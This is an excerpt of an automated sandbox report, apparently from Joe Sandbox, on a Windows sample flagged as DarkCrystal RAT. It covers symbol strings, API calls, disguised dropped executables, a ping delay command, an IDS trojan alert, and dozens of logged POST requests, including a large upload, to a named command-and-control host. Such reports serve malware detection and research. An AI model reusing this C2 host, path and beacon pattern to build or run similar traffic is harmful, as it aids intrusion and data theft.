                          Source: Binary string: gC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: ~C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004987000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: iC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: lC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: yC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000426E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: nC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004B56000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000004E02000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: mC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007CA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_007CA69B
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007DC220
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007EB348 FindFirstFileExA,0_2_007EB348
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 4x nop then jmp 00007FF848F22426h6_2_00007FF848F1087A
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh6_2_00007FF8490BBABD
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 4x nop then jmp 00007FF848F22426h12_2_00007FF848F1087A
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh12_2_00007FF8490BBABD

                          Networking

                          barindex
                          Snort IDS alert for network traffic
                          Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.5:49712 -> 91.227.16.11:80
                          Uses ping.exe to check the status of other devices and networks
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox ViewIP Address: 91.227.16.11 91.227.16.11
                          Source: Joe Sandbox ViewASN Name: EXIMIUS-ASRU EXIMIUS-ASRU
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1908Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2584Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: multipart/form-data; boundary=----NXSs6uGjFUy79BBdK9dKPvwpKOgkEkW40KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 141782Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
